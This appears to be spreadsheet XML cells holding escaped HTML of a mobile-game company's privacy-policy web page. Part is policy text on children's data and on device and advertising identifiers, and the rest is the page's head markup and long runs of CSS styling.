    <t>When a user identifies himself or herself as a child under the age of 13 through a support request or through any feedback, we will not collect, store or use, and will delete in a secure manner, any personal information of such user.&lt;/p&gt;&lt;h2 class="md6ux4-3 hUZglJ"&gt;III. INFORMATION WE COLLECT FROM YOU&lt;/h2&gt;&lt;p class="sc-1eluo13-0 exEkaP"&gt;Most of the information that we collect about you comes directly from you when you play our Apps or interact with third party ads in our Apps or with our ads in other publisher’s apps. These information are collected through SDKs (Software Development Kits) which are technical tools integrated into our Apps.</t>
  </si>
  <si>
    <t>In general, the information we collect about you relates to the type of device you are using, information that helps us identify your device, how you play our apps and may include information that you submit to us when you voluntarily contact us. We will sometimes use third party advertising companies to help us collect this data. Further information is provided below in the section titled &amp;quot;Third party advertising companies&amp;quot;.&lt;/p&gt;&lt;h2 class="md6ux4-3 hUZglJ"&gt;A. TECHNICAL INFORMATION&lt;/h2&gt;&lt;p class="sc-1eluo13-0 exEkaP"&gt;We collect technical information about your device that are necessary for you to use our App and additional technical data that enables us to maintain and analyze the functioning of the App, to personalize the content of the App, and to display advertisements.</t>
  </si>
  <si>
    <t>Such information includes amongst others the type of device(s) you are using to play our Apps, persistent identifiers, such as IP address, device identifiers, ad identifiers, unique user ID specific for our Apps, and the country or region that you are playing in.&lt;/p&gt;&lt;h2 class="md6ux4-3 hUZglJ"&gt;B. ADVERTISING AND APPLICATION USAGE INFORMATION&lt;/h2&gt;&lt;p class="sc-1eluo13-0 exEkaP"&gt;When you use our Apps, we collect additional information from you by using advertisement identifiers that permit identification of your device. We collect information about how you play our Apps, how you interact with</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang="en-US" itemscope itemtype="http://schema.org/WebPage"&gt;&lt;head&gt;&lt;meta charset="utf-8"&gt;&lt;script nonce="_9n4RqpQXYhRC83kacRrKQ"&gt;var DOCS_timing={}; DOCS_timing['sl']=new Date().getTime();&lt;/script&gt;&lt;script nonce="_9n4RqpQXYhRC83kacRrKQ"&gt;function _DumpException(e) {throw e;}&lt;/script&gt;&lt;script nonce="_9n4RqpQXYhRC83kacRrKQ"&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2TDJrhtSXPVtWuloZoWP1Zt-WA3c8F4psp6TA-djfpFWhV2UfCaJXPdg7Aw9WK3o5Qk1CN","je":1,"sstu":1681340111640444,"si":"CIGv54C4pf4CFTTISgAdF8sEzw","gsc":null,"ei":[5703839,5704621,5706832,5706836,5707711,5735806,5737441,5737800,5738529,5740814,5743124,5746993,5747265,5748029,5752694,5753329,5754229,5754594,5758824,5760348,5760827,5762729,5764268,5765551,5766777,5770435,5773678,5774347,5776517,5776917,5777194,14101306,14101502,14101510,14101534,49369425,49372443,49375322,49376001,49378889,49451559,49453045,49472071,49474087,49512373,49622831,49623181,49624080,49644023,49648914,49654053,49700904,49703398,49765382,49816165,49822929,49823162,49824163,49839579,49842863,49898325,49924714,50022334,50127540,50166959,50168315,50174666,50224286,50263472,50291080,50313182,50322323,50347762,50455861,50468091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href="https://ssl.gstatic.com/atari/images/public/favicon.ico"&gt;&lt;meta property="og:title" content="gamesfarm - Privacy"&gt;&lt;meta property="og:type" content="website"&gt;&lt;meta property="og:url" content="https://www.gamesfarmllc.com/privacy"&gt;&lt;meta property="og:description" content="
What personal info are collected?
 We are committed to protect the User’s information, be it yours or your kid’s.</t>
  </si>
  <si>
    <t>We believe that you have a right to know our practices regarding the information we may collect and use when you use our Products (as defined on the Terms of Use) and website (the"&gt;&lt;meta itemprop="name" content="gamesfarm - Privacy"&gt;&lt;meta itemprop="description" content="
What personal info are collected?
 We are committed to protect the User’s information, be it yours or your kid’s. We believe that you have a right to know our practices regarding the information we may collect and use when you use our Products (as defined on the Terms of Use) and website (the"&gt;&lt;meta itemprop="url" content="https://www.gamesfarmllc.com/privacy"&gt;&lt;link href="https://fonts.googleapis.com/</t>
  </si>
  <si>
    <t>css?family=Playfair%20Display%3A400%2C700%7COpen%20Sans%3A400%2C700&amp;display=swap" rel="stylesheet" nonce="z89d5ezf_Tni7PRozyz01A"&gt;&lt;link href="https://fonts.googleapis.com/ css?family=Google+Sans:400,500|Roboto:300,400,500,700|Source+Code+Pro:400,700&amp;display=swap" rel="stylesheet" nonce="z89d5ezf_Tni7PRozyz01A"&gt;&lt;link rel="stylesheet" href="https://www.gstatic.com/_/atari/_/ss/k=atari.vw.jffPnSbrV38.L.X.O/d=1/rs=AGEqA5liTY9eJ3KZzwxTWsMzfIyQn11GcQ" data-id="_cl" nonce="z89d5ezf_Tni7PRozyz01A"&gt;&lt;script nonce="_9n4RqpQXYhRC83kacRrKQ"&gt;&lt;/script&gt;&lt;title&gt;gamesfarm - Privacy&lt;/title&gt;&lt;style jsname="ptDGoc" nonce="z89d5ezf_Tni7PRozyz01A"&gt;.ImnMyf{background-color: rgba(255,255,255,1); color: rgba(33,33,33,1);}.Vs12Bd{background-color: rgba(240,240,240,1); color: rgba(33,33,33,1);}.S5d9Rd{background-color: rgba(58,58,58,1); color: rgba(255,255,255,1);}.O13XJf{height: 340px;}.O13XJf .IFuOkc{background-image: url(https://ssl.gstatic.com/atari/images/vision-header.jpg);}.O13XJf .IFuOkc:before{background-color: rgba(31,31,31,1); opacity: 0.5; display: block;}.O13XJf .zfr3Q{color: rgba(255,255,255,1);}.O13XJf .qnVSj{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.O13XJf .Glwbz{color: rgba(255,255,255,1);}.O13XJf .qLrapd{color: rgba(255,255,255,1);}.O13XJf .aHM7ed{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.O13XJf .NHD4Gf{color: rgba(255,255,255,1);}.O13XJf .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(0,0,0,1); color: rgba(0,0,0,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}@media only screen and (max-width: 479px){.O13XJf .QmpIrf{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.O13XJf .QmpIrf{font-size: 11pt;}}@media only screen and (max-width: 479px){.O13XJf{height: 250px;}}.SBrW1{height: 430px; padding-bottom: 120px; padding-top: 120px;}@media only screen and (min-width: 1280px){.yMcSQd .SBrW1{padding-bottom: 120px; padding-top: 176px;}}@media only screen and (max-width: 1279px){.Ly6Unf .SBrW1{padding-bottom: 120px; padding-top: 176px;}}.Wew9ke{fill: rgba(255,255,255,1);}.fOU46b .KJll8d{background-color: rgba(255,255,255,1);}.fOU46b .tCHXDc{color: rgba(255,255,255,1);}.fOU46b .iWs3gf.chg4Jd:focus{background-color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,0.1199999973);}.fOU46b .G8QRnc .tCHXDc{color: rgba(255,255,255,1);}.fOU46b .G8QRnc .iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}.fOU46b .aCIEDd .tCHXDc{color: rgba(255,255,255,1);}.fOU46b .aCIEDd</t>
  </si>
  <si>
    <t>.iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}@media only screen and (min-width: 1280px){.b2Iqye.fOU46b .G8QRnc .tCHXDc{color: rgba(33,33,33,1);}}.b2Iqye.fOU46b .iWs3gf.chg4Jd:focus{background-color: rgba(33,33,33,0.1199999973);}@media only screen and (min-width: 1280px){.b2Iqye.fOU46b</t>
  </si>
  <si>
    <t>.aCIEDd .tCHXDc{color: rgba(0,0,0,1);}}.b2Iqye.fOU46b .iWs3gf.chg4Jd:focus{background-color: rgba(0,0,0,0.1199999973);}@media</t>
  </si>
  <si>
    <t>only screen and (min-width: 1280px){.XeSM4.b2Iqye.fOU46b .LBrwzc .tCHXDc{color: rgba(255,255,255,1);}}.XeSM4.b2Iqye.fOU46b .LBrwzc .iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}@media only screen and (min-width: 1280px){.KuNac.b2Iqye.fOU46b .GBy4H .tCHXDc{color:</t>
  </si>
  <si>
    <t>rgba(33,33,33,1);}}.KuNac.b2Iqye.fOU46b .iWs3gf.chg4Jd:focus{background-color: rgba(33,33,33,0.1199999973);}@media only screen and (min-width: 1280px){.fOU46b .XeSM4 .tCHXDc{color: rgba(255,255,255,1);}}.fOU46b .XeSM4 .iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}@media only screen and (min-width: 1280px){.fOU46b</t>
  </si>
  <si>
    <t>.KuNac .tCHXDc{color: rgba(33,33,33,1);}}.fOU46b .KuNac .iWs3gf.chg4Jd:focus{background-color: rgba(33,33,33,0.1199999973);}.fOU46b .YTv4We.chg4Jd:focus:before{border-color: rgba(255,255,255,1); display: block;}.fOU46b .zDUgLc{opacity:</t>
  </si>
  <si>
    <t>1;}.fOU46b .LBrwzc .zDUgLc{border-bottom-style: none;}.YSH9J{color: rgba(255,255,255,1);}.oNsfjf{color: rgba(255,255,255,1);}.wgxiMe{background-color: rgba(98,66,66,1);}.JzO0Vc{background-color: rgba(98,66,66,1);}.M63kCb{background-color: rgba(255,255,255,1);}.zfr3Q{font-family: 'Open Sans'; color: rgba(33,33,33,1); font-size: 11pt; line-height: 1.6; margin-top: 15px;}.qnVSj{color: rgba(33,33,33,1);}.Glwbz{color: rgba(33,33,33,1);}.dhtgD{text-decoration: underline;}.dhtgD:hover{opacity: 0.7;}.dhtgD:active{opacity: 0.7;}.yaqOZd .duRjpb</t>
  </si>
  <si>
    <t>:not(.TYR86d):not(.Ap4VC):first-child{padding-top: 13px;}.yaqOZd .duRjpb :not(.TYR86d):first-of-type{padding-top: 13px;}.yaqOZd .duRjpb:not(.TYR86d):last-child{padding-bottom: 13px;}.duRjpb{font-family: 'Playfair Display'; font-size: 34pt; line-height: 1.2; font-weight: 700; color: rgba(98,66,66,1);}.duRjpb:not(.TYR86d){margin-top: 30px; padding-top: 13px; padding-bottom: 13px; border-bottom-color: rgba(240,240,240,1); border-top-color: rgba(240,240,240,1); border-bottom-style: solid; border-top-style: solid; border-bottom-width: 5px; border-top-width: 5px;}.Ap4VC{margin-bottom: -30px;}.qLrapd{color: rgba(98,66,66,1);}.JYVBee{font-family: 'Open Sans'; font-size: 21pt; line-height: 1.25; font-weight: 700; margin-top: 25px; color: rgba(33,33,33,1);}.CobnVe{margin-bottom: -25px;}.aHM7ed{color: rgba(33,33,33,1);}.OmQG5e{font-family: 'Open Sans'; font-size: 15pt; line-height: 1.25; margin-top: 20px; font-weight: 700; color: rgba(98,66,66,1);}.GV3q8e{margin-bottom: -20px;}.NHD4Gf{color: rgba(98,66,66,1);}.duRjpb .OUGEr{color:</t>
  </si>
  <si>
    <t>rgba(98,66,66,1);}.JYVBee .OUGEr{color: rgba(33,33,33,1);}.OmQG5e .OUGEr{color: rgba(98,66,66,1);}.TMjjoe{font-family: 'Playfair Display'; font-size: 9pt; line-height: 1.2; margin-top: 0px;}.Zjiec{font-family: 'Playfair Display'; font-weight: 400; font-size: 20pt; line-height: 1.75; margin-top: 48px; margin-left: 48px; margin-bottom: 62px; margin-right: 32px;}.XMyrgf{margin-top: 48px; margin-left: 48px; margin-bottom: 0px; margin-right: 32px;}.PsKE7e{font-family: 'Open Sans'; font-weight: 400; font-size: 12pt;}.IKA38e{border-left-width: 8px; border-left-style: solid; border-left-color: transparent;}.lhZOrc{color: 0.6; border-left-color: rgba(255,255,255,1); font-weight: 700;}.rysYnb .mohMlc{padding-left: 24px;}.Mz8gvb{color: rgba(255,255,255,1);}.LBrwzc .YSH9J{color: rgba(33,33,33,1);}.LBrwzc .oNsfjf{color: rgba(33,33,33,1);}.LBrwzc .KJll8d{background-color: rgba(33,33,33,1);}.LBrwzc .YTv4We.chg4Jd:focus:before{border-color: rgba(33,33,33,1); display: block;}.LBrwzc .Mz8gvb{color:</t>
  </si>
  <si>
    <t>rgba(33,33,33,1);}.LBrwzc .wgxiMe{background-color: rgba(255,255,255,1);}.LBrwzc .lhZOrc{border-left-color: rgba(98,66,66,1);}.LBrwzc .M9vuGd{border-bottom-color: rgba(98,66,66,1);}.LBrwzc .Mz8gvb{color: rgba(33,33,33,1);}.LBrwzc .zDUgLc{border-bottom-color: rgba(204,204,204,1); border-bottom-width: 1px; border-bottom-style: solid;}.GBy4H .oNsfjf{color: rgba(255,255,255,1);}.GBy4H .YSH9J{color: rgba(255,255,255,1);}.GBy4H .Mz8gvb{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.GBy4H .wgxiMe{background-color: rgba(0,0,0,1);}.GBy4H .M9vuGd{border-bottom-color: rgba(255,255,255,1);}.GBy4H .Mz8gvb{color: rgba(255,255,255,1);}.TlfmSc{font-family: 'Playfair Display'; font-weight: 400; font-size: 15pt; line-height: 1.33;}.jgXgSe{font-family: 'Open Sans'; font-weight: 400; font-size: 12pt; line-height: 28px;}.u5fiyc{line-height: 28px;}.IKA38e{padding-left: 28px; margin-top: 20px;}.hDrhEe{font-family: 'Open Sans'; font-weight: 400;}.iwQgFb{height: 2px; margin-top: 8px; background-color: rgba(0,0,0,0.150000006);}.ySLm4c{font-family: 'Open Sans';}.CbiMKe{background-color: rgba(98,66,66,1);}.QmpIrf{background-color: rgba(98,66,66,1); border-color: rgba(255,255,255,1); color: rgba(255,255,255,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}.qeLZfd:before{background-color: rgba(240,240,240,1); display: block;}.qeLZfd .iwQgFb{background-color: rgba(98,66,66,1);}.qeLZfd .zfr3Q{color: rgba(33,33,33,1);}.qeLZfd .qnVSj{color: rgba(33,33,33,1);}.qeLZfd .Glwbz{color: rgba(33,33,33,1);}.qeLZfd .duRjpb{border-bottom-color: rgba(255,255,255,1); border-top-color: rgba(255,255,255,1); color: rgba(98,66,66,1);}.qeLZfd .qLrapd{color: rgba(98,66,66,1);}.qeLZfd .JYVBee{color: rgba(33,33,33,1);}.qeLZfd .aHM7ed{color:</t>
  </si>
  <si>
    <t>rgba(33,33,33,1);}.qeLZfd .OmQG5e{color: rgba(98,66,66,1);}.qeLZfd .NHD4Gf{color: rgba(98,66,66,1);}.qeLZfd .duRjpb .OUGEr{color :</t>
  </si>
  <si>
    <t>rgba(98,66,66,1);}.qeLZfd .JYVBee .OUGEr{color: rgba(33,33,33,1);}.qeLZfd .OmQG5e</t>
  </si>
  <si>
    <t>.OUGEr{color: rgba(98,66,66,1);}.lQAHbd:before{background-color: rgba(58,58,58,1); display: block;}.lQAHbd .iwQgFb{background-color: rgba(107,77,77,1);}.lQAHbd .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(0,0,0,1); color: rgba(0,0,0,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}.lQAHbd .CbiMKe{background-color: rgba(255,255,255,1);}@media only screen and (max-width: 479px){.lQAHbd .QmpIrf{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.lQAHbd .QmpIrf{font-size: 11pt;}}.lQAHbd .zfr3Q{color: rgba(255,255,255,1);}.lQAHbd .qnVSj{color: rgba(255,255,255,1);}.lQAHbd .Glwbz{color: rgba(255,255,255,1);}.lQAHbd .duRjpb{color: rgba(255,255,255,1); border-top-color: rgba(48,48,48,1); border-bottom-color: rgba(48,48,48,1);}.lQAHbd .qLrapd{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.lQAHbd .JYVBee{color: rgba(255,255,255,1);}.lQAHbd .aHM7ed{color: rgba(255,255,255,1);}.lQAHbd .OmQG5e{color: rgba(255,255,255,1);}.lQAHbd .NHD4Gf{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.lQAHbd .OUGEr{color: rgba(255,255,255,1);}.LB7kq{padding-bottom: 56px; padding-top: 56px;}@media only screen and (max-width: 479px){.LB7kq{padding-bottom: 28px; padding-top: 28px;}}@media only screen and (min-width: 1280px){.yMcSQd .LB7kq{padding-bottom: 56px; padding-top: 112px;}}@media only screen and (min-width: 1280px){.yMcSQd .tCHXDc{color: rgba(255,255,255,1);}}.yMcSQd .iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}@media only screen and (min-width: 1280px){.yMcSQd .LBrwzc .tCHXDc{color: rgba(33,33,33,1);}}.yMcSQd .LBrwzc</t>
  </si>
  <si>
    <t>.iWs3gf.chg4Jd:focus{background-color: rgba(33,33,33,0.1199999973);}@media only screen and (min-width: 1280px){.yMcSQd .GBy4H .tCHXDc{color: rgba(255,255,255,1);}}.yMcSQd .GBy4H</t>
  </si>
  <si>
    <t>.iWs3gf.chg4Jd: focus{background-color: rgba(255,255,255,0.1199999973);}@media only screen and (min-width: 1280px){.KuNac.yMcSQd .GBy4H</t>
  </si>
  <si>
    <t>.tCHXDc{color: rgba(255,255,255,1);}}.KuNac.yMcSQd .GBy4H .iWs3gf.chg4Jd:</t>
  </si>
  <si>
    <t>focus{background-color: rgba(255,255,255,0.1199999973);}@media only screen and (min-width: 480px) and (max-width: 1279px){.Ly6Unf .LB7kq{padding-bottom: 56px; padding-top: 112px;}}@media only screen and (min-width: 480px) and (max-width: 1279px){.Ly6Unf .tCHXDc{color: rgba(255,255,255,1);}}.Ly6Unf .iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}@media only screen and (min-width: 480px) and (max-width: 1279px){.Ly6Unf .GBy4H .tCHXDc{color: rgba(255,255,255,1);}}.Ly6Unf .GBy4H</t>
  </si>
  <si>
    <t>.iWs3gf.chg4Jd: focus{background-color: rgba(255,255,255,0.1199999973);}@media only screen and (min-width: 480px) and (max-width: 1279px){.Ly6Unf .LBrwzc .tCHXDc{color:</t>
  </si>
  <si>
    <t>rgba(33,33,33,1);}}.Ly6Unf .LBrwzc .iWs3gf.chg4Jd:focus{background-color: rgba(33,33,33,0.1199999973);}@media only screen and (max-width: 479px){.Ly6Unf .LB7kq{padding-bottom: 28px; padding-top: 84px;}}@media only screen and (max-width: 479px){.Ly6Unf .tCHXDc{color: rgba(255,255,255,1);}}.Ly6Unf .iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}@media only screen and (max-width: 479px){.Ly6Unf</t>
  </si>
  <si>
    <t>.GBy4H .tCHXDc{color: rgba(255,255,255,1);}}.Ly6Unf .GBy4H .iWs3gf.chg4Jd: focus{background-color: rgba(255,255,255,0.1199999973);}@media only screen and (max-width:</t>
  </si>
  <si>
    <t>479px){.Ly6Unf .LBrwzc .tCHXDc{color: rgba(33,33,33,1);}}.Ly6Unf .LBrwzc .iWs3gf.chg4Jd:focus{background-color: rgba(33,33,33,0.1199999973);}@media only screen and (min-width: 480px) and (max-width:</t>
  </si>
  <si>
    <t>767px){.Ly6Unf .gk8rDe{padding-top: 84px; padding-bottom: 28px;}}@media only screen and (max-width: 479px){.Ly6Unf .gk8rDe{padding-top: 56px; padding-bottom: 0px;}}.LB7kq .duRjpb{font-size: 58pt; line-height: 1.06; font-weight: 700; margin-top: 35px; border-bottom-style: none; border-top-style: none;}@media only screen and (max-width: 479px){.LB7kq .duRjpb{font-size: 37pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.LB7kq .duRjpb{font-size: 49pt;}}.cJgDec .zfr3Q{color: rgba(255,255,255,1); border-bottom-color: rgba(255,255,255,1); border-top-color: rgba(255,255,255,1);}.cJgDec .zfr3Q</t>
  </si>
  <si>
    <t>.OUGEr{color : rgba(255,255,255,1);}.cJgDec .qnVSj{color: rgba(255,255,255,1);}.cJgDec .Glwbz{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.cJgDec .qLrapd{color: rgba(255,255,255,1);}.cJgDec .aHM7ed{color: rgba(255,255,255,1);}.cJgDec .NHD4Gf{color: rgba(255,255,255,1);}.cJgDec .IFuOkc:before{background-color: rgba(33,33,33,1); opacity: 0.5; display: block;}.cJgDec .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(0,0,0,1); color: rgba(0,0,0,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}@media only screen and (max-width: 479px){.cJgDec .QmpIrf{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.cJgDec .QmpIrf{font-size: 11pt;}}.tpmmCb .zfr3Q{color: rgba(15,15,15,1); border-bottom-color: rgba(15,15,15,1); border-top-color: rgba(15,15,15,1);}.tpmmCb .zfr3Q .OUGEr{color: rgba(15,15,15,1);}.tpmmCb .qnVSj{color: rgba(15,15,15,1);}.tpmmCb .Glwbz{color:</t>
  </si>
  <si>
    <t>rgba(15,15,15,1);}.tpmmCb .qLrapd{color: rgba(15,15,15,1);}.tpmmCb .aHM7ed{color: rgba(15,15,15,1);}.tpmmCb .NHD4Gf{color: rgba(15,15,15,1);}.tpmmCb .IFuOkc:before{background-color: rgba(255,255,255,1); display: block;}.tpmmCb .Wew9ke{fill: rgba(15,15,15,1);}.tpmmCb .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(0,0,0,1); color: rgba(0,0,0,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}@media only screen and (max-width: 479px){.tpmmCb .QmpIrf{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.tpmmCb .QmpIrf{font-size: 11pt;}}.gk8rDe .duRjpb{font-size: 40pt;}.gk8rDe .zfr3Q{color: rgba(15,15,15,1);}.gk8rDe .duRjpb{color: rgba(15,15,15,1);}.gk8rDe .qLrapd{color: rgba(15,15,15,1);}.gk8rDe .OmQG5e{color: rgba(15,15,15,1);}.gk8rDe .NHD4Gf{color:</t>
  </si>
  <si>
    <t>rgba(15,15,15,1);}.gk8rDe .QmpIrf{background-color: rgba(98,66,66,1); border-color: rgba(255,255,255,1); color: rgba(255,255,255,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}@media only screen and (max-width: 479px){.gk8rDe .duRjpb{font-size: 27pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.gk8rDe .duRjpb{font-size: 34pt;}}@media only screen and (max-width: 479px){.gk8rDe .QmpIrf{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.gk8rDe .QmpIrf{font-size: 11pt;}}.zDUgLc{background-color: rgba(98,66,66,1); opacity: 1;}.qV4dIc{border-bottom-color: rgba(255,255,255,0); border-bottom-style: solid; border-bottom-width: 8px; padding-top: 14px; padding-bottom: 6px; padding-left: 2px; padding-right: 2px; margin-left: 10px; margin-right: 10px;}.M9vuGd{border-bottom-color: rgba(255,255,255,1);}.eWDljc{background-color: rgba(98,66,66,1); padding-bottom: 28px;}.PsKE7e:hover{opacity: 0.6;}.BFDQOb:hover{opacity: 0.6;}.QcmuFb{padding-left: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200px;}.xkUom{border-color: rgba(98,66,66,1); color: rgba(98,66,66,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}.xkUom:hover{background-color: rgba(98,66,66,0.1000000015);}.KjwKmc{color: rgba(98,66,66,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}.KjwKmc:hover{background-color: rgba(98,66,66,0.1000000015);}.lQAHbd .xkUom{border-color: rgba(255,255,255,1); color: rgba(255,255,255,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}.lQAHbd .xkUom:</t>
  </si>
  <si>
    <t>hover{background-color: rgba(255,255,255,0.1000000015);}.lQAHbd .KjwKmc{color: rgba(255,255,255,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}.lQAHbd .KjwKmc:hover{background-color: rgba(255,255,255,0.1000000015);}@media only screen and (max-width: 479px){.lQAHbd .xkUom{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.lQAHbd .xkUom{font-size: 11pt;}}@media only screen and (max-width: 479px){.lQAHbd .KjwKmc{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.lQAHbd .KjwKmc{font-size: 11pt;}}.lQAHbd .Mt0nFe{border-color: rgba(255,255,255,0.200000003);}.cJgDec .xkUom{border-color: rgba(255,255,255,1); color: rgba(255,255,255,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}.cJgDec .xkUom :</t>
  </si>
  <si>
    <t>hover{background-color: rgba(255,255,255,0.1000000015);}.cJgDec .KjwKmc{color: rgba(255,255,255,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}.cJgDec .KjwKmc:hover{background-color: rgba(255,255,255,0.1000000015);}@media only screen and (max-width: 479px){.cJgDec .xkUom{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.cJgDec .xkUom{font-size: 11pt;}}@media only screen and (max-width:</t>
  </si>
  <si>
    <t>479px){.cJgDec .KjwKmc{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.cJgDec .KjwKmc{font-size: 11pt;}}.tpmmCb .xkUom{border-color: rgba(98,66,66,1); color: rgba(98,66,66,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}.tpmmCb .xkUom: hover{background-color: rgba(98,66,66,0.1000000015);}.tpmmCb .KjwKmc{color: rgba(98,66,66,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}.tpmmCb .KjwKmc:hover{background-color: rgba(98,66,66,0.1000000015);}@media only screen and (max-width: 479px){.tpmmCb .xkUom{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.tpmmCb .xkUom{font-size: 11pt;}}@media only screen and (max-width: 479px){.tpmmCb .KjwKmc{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.tpmmCb .KjwKmc{font-size: 11pt;}}.gk8rDe .xkUom{border-color: rgba(98,66,66,1); color: rgba(98,66,66,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}.gk8rDe .xkUom: hover{background-color: rgba(98,66,66,0.1000000015);}.gk8rDe .KjwKmc{color: rgba(98,66,66,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}.gk8rDe .KjwKmc:hover{background-color:</t>
  </si>
  <si>
    <t>rgba(98,66,66,0.1000000015);}@media only screen and (max-width: 479px){.gk8rDe .xkUom{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.gk8rDe .xkUom{font-size: 11pt;}}@media only screen and (max-width: 479px){.gk8rDe .KjwKmc{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.gk8rDe .KjwKmc{font-size: 11pt;}}.O13XJf .xkUom{border-color: rgba(255,255,255,1); color: rgba(255,255,255,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}.O13XJf .xkUom:hover{background-color: rgba(255,255,255,0.1000000015);}.O13XJf .KjwKmc{color: rgba(255,255,255,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}.O13XJf .KjwKmc:hover{background-color: rgba(255,255,255,0.1000000015);}@media only screen and (max-width: 479px){.O13XJf .xkUom{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.O13XJf .xkUom{font-size: 11pt;}}@media only screen and (max-width: 479px){.O13XJf .KjwKmc{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.O13XJf .KjwKmc{font-size: 11pt;}}.Y4CpGd{font-family: 'Open Sans'; font-size: 11pt;}.CMArNe{background-color: rgba(240,240,240,1);}@media only screen and (max-width: 479px){.duRjpb{font-size: 24pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.duRjpb{font-size: 29pt;}}@media only screen and (max-width: 479px){.JYVBee{font-size: 17pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.JYVBee{font-size: 19pt;}}@media only screen and (max-width: 479px){.OmQG5e{font-size: 13pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.OmQG5e{font-size: 14pt;}}@media only screen and (max-width: 479px){.TMjjoe{font-size:</t>
  </si>
  <si>
    <t>9pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.TMjjoe{font-size: 9pt;}}@media only screen and (max-width: 479px){.Zjiec{font-size: 16pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.Zjiec{font-size: 18pt;}}@media only screen and (max-width: 479px){.PsKE7e{font-size: 12pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.PsKE7e{font-size: 12pt;}}@media only screen and (max-width: 479px){.TlfmSc{font-size: 13pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.TlfmSc{font-size: 14pt;}}@media only screen and (max-width: 479px){.jgXgSe{font-size: 12pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.jgXgSe{font-size: 12pt;}}@media only screen and (max-width: 479px){.QmpIrf{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.QmpIrf{font-size: 11pt;}}@media only screen and (max-width: 479px){.xkUom{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.xkUom{font-size: 11pt;}}@media only screen and (max-width: 479px){.KjwKmc{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.KjwKmc{font-size: 11pt;}}section[id="h.5fb17be1e3bff749_1"] .IFuOkc:before{opacity: 0.0;}&lt;/style&gt;&lt;script nonce="_9n4RqpQXYhRC83kacRrKQ"&gt;_at_config</t>
  </si>
  <si>
